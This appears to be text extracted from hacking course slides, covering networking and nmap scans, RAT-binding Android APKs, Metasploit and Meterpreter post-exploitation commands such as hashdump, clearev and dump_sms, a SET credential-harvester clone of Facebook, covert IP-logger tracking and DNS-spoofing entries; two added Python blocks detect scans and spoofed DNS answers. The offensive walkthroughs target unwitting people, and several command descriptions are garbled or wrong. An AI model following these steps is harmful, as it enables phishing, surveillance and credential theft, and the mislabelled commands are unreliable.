Elements of Cyber Security
End-user Compliance: Creating a security awareness training
program.
Information Security: Protection against the unauthorized use of
information.
Platform and Application Security: Find information on
software vulnerability and threat management, application
attacks, software security tools, application firewalls, software
patching and more.
Network Security: Network security consists of the policies and
practices adopted to prevent and monitor unauthorized access,
misuse, modification or denial of a computer network and
network-accessible resources.
Disaster Recovery: Documented process or set of procedures
to recover and protect a business IT infrastructure in the event of
a disaster.
What is Hacking?
Identifying weaknesses in computer systems, software or
networks and exploiting those weaknesses to gain access.
Who is a Hacker?
A Hacker is a person who finds and exploits the weakness in computer
systems and/or networks to gain access. Hackers are usually skilled computer
programmers with knowledge of computer security.
Types of Hackers
White Hat: Identifies weaknesses in the system/network for the organization.
Black Hat: Identifies weaknesses in the system/network to steal data and
demand money.
Gray Hat: Identifies weaknesses in the system/network for both offence and
defence.
Script Kiddies: Use only tools, without any conceptual knowledge.
Phases of Hacking
Target Scoping
Reconnaissance (Passive Information)
Scanning (Active Information)
Vulnerability Analysis
Building Exploit
Attack and Gain Access
Maintaining Access
Clearing Tracks or Reporting
Hacking Terminology
Vulnerability
Bug or Weakness in the Software
Exploit
Make use of (a situation) in a way considered unfair or
underhand.
Payload
A payload refers to the component of a computer virus
that executes a malicious activity
Hacking Terminology
Tor Browser
VPN / Proxies
https://www.mailinator.com
https://www.guerrillamail.com
http://mailexpire.com
http://www.fakeinbox.com
Foot Printing / Reconnaissance
Organization: Website Details; DNS and Name Servers Information
Individual: Email Details; Any other Contacts Information if Possible
Basics of Networking
[Figure: network diagram showing the Internet backbone, MSPs and ISPs, a data center, DNS, and routers with per-network port tables (NW / P.No) forwarding an IP packet between private hosts (10.1.1.x) and public addresses; the diagram did not survive extraction.]
The OSI Model (Open Systems Interconnection)
Layer  OSI model      TCP/IP model
7      Application    Application
6      Presentation   Application
5      Session        Application
4      Transport      TCP
3      Network        IP
2      Datalink       Host-to-Network
1      Physical       Host-to-Network
IP Addresses Classification
[Table: Class, Starting, Ending; rows not recoverable]
[Figure: IP header and UDP header for the example address 192.14.26.7; the IP address selects the host]
ICANN port ranges
Registered: 1,024 to 49,151
Linux
bash# ifconfig - Display IP Address Information
URG (Urgent): This flag is used to identify incoming data as 'urgent'. Such incoming
segments do not have to wait until the previous segments are consumed by the
receiving end but are sent directly and processed immediately.
PSH (Push): The Push flag, like the Urgent flag, exists to ensure that the data is given
the priority (that it deserves) and is processed at the sending or receiving end.
RST (Reset): This indicates that the remote host has reset the connection.
Stealth Mode
This scan is also known as a half-open scan, because nmap confirms that a port is open
on the destination as soon as the destination port completes a two-way handshake with
the attacker (nmap).
Syn
Syn / Ack
Port is Open
Syn
Rst
Port is Closed
A firewall does not raise an alarm for a two-way handshake. For a three-way handshake,
the firewall raises an alarm if the IP is from outside.
# nmap -sS 192.168.0.146
Note: it scans only 1000 important ports.
Closed: Target Software is Not Running
Open: Service is running and allowing connections
Filtered: Service is running behind the Firewall.
TCP Connect Scan
Syn
Syn / Ack
Ack
Port is Open
Syn
Rst
Port is Closed
This scan is also known as a Full Open Scan because nmap confirms that a port is open
only when it is able to complete the 3-way handshake with the destination computer's port.
# nmap -sT 192.168.0.150
Other Scan Options
Software Version Scan
# nmap -sV 192.168.0.146
It checks for the software versions running in the Server/Target.
FIN
FIN
Rst
Port is Closed and Target is Windows
Note: Honeypots create the impression that the target has a different operating system.
XMAS Scan
# nmap -sX 192.168.0.146
It checks for the OS running in the Server/Target.
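The flag patterns of the scans described above are also what a defender looks for. The following is an added example, not code from the original slides: it labels each client-to-port conversation by the TCP flags the client sent and reports sources that probe several ports the same way. The sample packets, the source addresses and the `min_ports` threshold are constructed assumptions.

```python
from collections import Counter, defaultdict

# TCP flag bits as they appear in the TCP header
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

def classify_probe(flags_seq):
    """Label one client->port conversation from the flags the client sent, in order."""
    first, rest = flags_seq[0], flags_seq[1:]
    if first == FIN | PSH | URG:
        return "xmas"
    if first == FIN:
        return "fin"
    if first != SYN:
        return "other"
    if any(f & PSH for f in rest):
        return "data"       # handshake completed and payload sent: ordinary client
    if any(f == ACK for f in rest):
        return "connect"    # three-way handshake completed, then dropped without data
    return "half-open"      # SYN only (closed port) or SYN then RST (open port)

def detect_scans(packets, min_ports=3):
    """Return {source: scan type} for sources that probe >= min_ports ports alike."""
    convs = defaultdict(list)
    for src, dport, flags in packets:
        convs[(src, dport)].append(flags)
    per_src = defaultdict(Counter)
    for (src, _), seq in convs.items():
        per_src[src][classify_probe(seq)] += 1
    findings = {}
    for src, counts in per_src.items():
        label, n = counts.most_common(1)[0]
        if label not in ("data", "other") and n >= min_ports:
            findings[src] = label
    return findings

# Constructed sample capture: (source IP, destination port, flags sent by the source)
SAMPLE = (
    [("10.0.0.5", p, f) for p in (22, 80) for f in (SYN, RST)]
    + [("10.0.0.5", p, SYN) for p in (443, 8080)]
    + [("10.0.0.6", p, f) for p in (22, 80, 443) for f in (SYN, ACK, RST | ACK)]
    + [("10.0.0.7", p, FIN | PSH | URG) for p in (21, 22, 23)]
    + [("10.0.0.8", 443, f) for f in (SYN, ACK, PSH | ACK, FIN | ACK)]
)

if __name__ == "__main__":
    for src, kind in sorted(detect_scans(SAMPLE).items()):
        print(f"{src}: {kind} scan pattern")
```

A half-open probe never sends the final ACK, so it is visible to any sensor that tracks handshake state per port rather than only completed connections.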
Passwords: crunch
Generate Passwords
# crunch 5 8 someguess -o destinationname.txt
Paste the link into the website and collect the short URL from the website.
Send the link to the target using email or any other social networking service.
Refresh the website for updates; you will get the IP details of the target if
the target clicks on the link.
Social Engineering Techniques
Get Read Notification of Mail
Step 1: Open http://readnotify.com Website and Register the Mail ID
Step 2: Log in to your mail, compose a mail, select the target mail ID,
add .readnotify.com at the end of the target mail ID and send the mail.
Ex: clabs@gmail.com.readnotify.com
Virus: A piece of code which is capable of copying itself and corrupting the system or
destroying data.
Worms: It is a standalone malware computer program that replicates itself in order to spread to
other computers.
Rootkits: A rootkit is designed to hide the fact that an operating system has been compromised.
Ransomware: Ransomware is a type of malicious software that blocks access to the victim's
data.
Crypters: Crypters are software tools that use a combination of encryption, obfuscation, and
code manipulation
Trojan / RAT
A Trojan / RAT (Remote Administration Tool) is a malicious
computer program which is used to hack into a computer by
misleading users of its true intent.
1. Darkcomet Rat
2. Pro Rat
3. Sub 7
4. Poison ID Rat
5. Zeus Rat
6. Cyber Gate Rat
7. Cerve Virus Rat
8. Turkogan Rat
9. Spy Eye
10. NJ Rat
11. Stuxnet
Social Engineering Techniques
Hack Windows System using Social Engineering and
Darkcomet Rat Tool
Social Engineering Techniques
Hack Android Mobile using Social
Engineering and Andro Rat Tool
1. Download Andro Rat Software and Run Andro Rat Binder
2. Upload any Apk File to Attach the RAT along with APK using Build+Bind Option
Or
Use only Bind Option to Attach the RAT File with an Inbuilt APK File
3. Press go to Generate the APK File.
4. Use Social Engineering to Make Install of APK file in Target Mobile and Run.
5. Run androrat tool present in the Androrat Directory to Capture the Information from
the Android Mobile.
Network Models in Social Engineering
Attacker and Target are in the Same Network
Network Models in Social Engineering
Attacker and Target are in Public Networks
Network Models in Social Engineering
Attacker and Target are in Different Private Networks
or Only Attacker in Private Network
Step 1: Port Forwarding (This only if the Router has Public IP Address)
[Figure: Hackers, Social Engineering, Lack of Knowledge and Awareness; Security, Functionality, Usability]
Prerequisites
1. Basics of Linux
2. Basics of Windows
3. Basics of Networking
4. Working with Virtual Box and Network Configurations
5. Working with Kali
6. Working with Tor Browser
7. Working with VPN and VPN Tools
8. Creating Fake Mail IDs for Temporary Purpose to Register in
Different Websites Ex: Mailinator.com
9. Get the Public IP Address -> grabify ip logger (grabify.link)
10. Get the Temporary Domain Name -> noip.com
Vulnerability Research
The process of discovering vulnerabilities and design flaws that will open an
operating system and its applications to attack or misuse.
Vulnerabilities are classified based on security level, severity level (low,
medium or high) and exploit range (local or remote).
Some Websites
1. Securityfocus.com
2. packetstormsecurity.com
3. us-cert.gov (Computer Emergency Response Team)
4. www.exploit-db.com
5. www.thehackernews.com
System Hacking with Metasploit
Exploit: It is a piece of malicious program code which takes help of
vulnerability to compromise the target computer and executes the payload for
controlling remote computers.
Types of Exploits:
1. Public Exploits
2. Private Exploits (Zero Day Exploit)
1. msfconsole
2. msfvenom
3. armitage
Hacking with Metasploit
List of Modules available in msfconsole (6 Modules)
1. Exploits
2. Auxiliary (Network Scanners, Port Scanners, Enumeration Tools, DoS Attack
Tools)
3. Payload
4. Post (Pattern Lock Remove, rooted phone whatsapp data)
5. Encoders (Without Recognize Payload) (Crypters Softwares using the
Payload)
6. Nop (No Operation Buffer Overflow Attacks)
msf> exploit
List of Android Meterpreter Commands
1. meterpreter> sysinfo -> System Information
2. meterpreter> hide_app_info -> Hide App Icon
3. meterpreter> check_root -> Phone is Rooted or not
4. meterpreter> dump_calllog -> All Logs will be Saved
5. meterpreter> dump_contacts -> All Contacts will be Stored
6. meterpreter> dump_sms -> Display all the Key Logger Recorded Data
7. meterpreter> record_mic -d 15 -> Record the Voice
8. meterpreter> webcam_list -> Cameras List
9. meterpreter> webcam_snap / webcam_snap -i 2 -> Take the Screenshot
10. meterpreter> shell -> Display the List of Web Cams
11. shell> download <src> <destination> -> Download File from Phone
12. shell> upload <src> <destination> -> Upload File to Phone
List of Meterpreter Commands
14. meterpreter> cd <path> -> Change the Directories
15. meterpreter> upload source dest -> Upload the File
    Note: We can add attrib +h +s +r <filename> -> To hide the File
16. meterpreter> shell
17. meterpreter> download source dest -> Download the file
18. meterpreter> clearev
19. meterpreter> getprivs -> Get all the privileges
20. meterpreter> migrate <processid> -> Move to a given process id process to
get more privileges
21. meterpreter> hashdump -> Extract Windows Account Password
22. meterpreter> background -> Minimize the Interpreter
23. meterpreter> sessions -l -> View Sessions
24. meterpreter> search bypassuac -> This record the voice but max 15 Secs
Phishing Attacks
Phishing: Phishing emails or pop-ups redirect the user to fake web pages that
clone trustworthy sites and ask them to submit their personal information.
Site: z-shadow.co / shadowwave.com
Kali Linux Tools: Application -> Social Engineering Tools -> SET (Social
Engineering Tool Kit)
Set>1 Step 1: Social Engineering Attacks
Set>2 Step 2: Website Attack Vectors
Set>3 Step 3: Credential Harvester Attack Method
Set>2 Step 4: Cloner
Set>192.168.10.106 Step 5: Enter IP Address where to Capture Information
Set>http://www.facebook.com Step6: Select the Website to Create the Fake Website
--------------------------
Capture data using sniffers and identify the passwords if the user entered information.
Filters: http.request.method == "POST"
DNS Poisoning
It is a technique that tricks a DNS Server into believing that it has received authentic
Information when in reality it has not. It results in substitution of a false IP Address at
the DNS level where web addresses are converted into numeric IP Address. It allows
attacker to replace IP Address entries for a target site on a given DNS Server with IP
Address of the Server he/she controls.
Step 1: Create a file and write the entries in the following way
192.168.10.6 www*
192.168.10.6 login*
192.168.10.6 accounts*
192.168.10.6 http*
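Poisoned entries like the ones above leave recognisable traces in resolver answers: many unrelated names collapse onto one address, and public names resolve into private address space. The following is an added example, not part of the original slides, that audits a list of (name, answer) pairs for those signs. The hostnames, the pinned addresses, the two-label domain heuristic and the threshold are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def base_domain(qname):
    # Assumption: the last two labels approximate the registrable domain.
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def audit_answers(answers, pinned=None, max_domains_per_ip=2):
    """Return {qname: sorted reasons} for answers that look spoofed.

    answers: list of (qname, ip) pairs observed for public hostnames.
    pinned:  optional {qname: set of expected IPs} from a trusted source.
    """
    pinned = pinned or {}
    domains_by_ip = defaultdict(set)
    for qname, ip in answers:
        domains_by_ip[ip].add(base_domain(qname))
    findings = defaultdict(set)
    for qname, ip in answers:
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in RFC1918):
            findings[qname].add("private-address")   # public name, internal IP
        if qname in pinned and ip not in pinned[qname]:
            findings[qname].add("pin-mismatch")      # differs from trusted record
        if len(domains_by_ip[ip]) > max_domains_per_ip:
            findings[qname].add("shared-ip")         # unrelated domains on one IP
    return {q: sorted(r) for q, r in findings.items()}

# Constructed sample: three unrelated names answered with the address used in
# the entries above, plus one clean answer from a documentation range.
SAMPLE = [
    ("www.example.com", "192.168.10.6"),
    ("login.example.org", "192.168.10.6"),
    ("accounts.example.net", "192.168.10.6"),
    ("www.example.edu", "203.0.113.10"),
]
PINNED = {"www.example.com": {"203.0.113.20"},
          "www.example.edu": {"203.0.113.10"}}

if __name__ == "__main__":
    for name, reasons in audit_answers(SAMPLE, PINNED).items():
        print(name, reasons)
```

Internal zones legitimately resolve to private addresses, so the check is meant for names that should be public.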
Types of Crypters:
1. Public
2. Demo Crypter
3. Private or Zero Day Crypter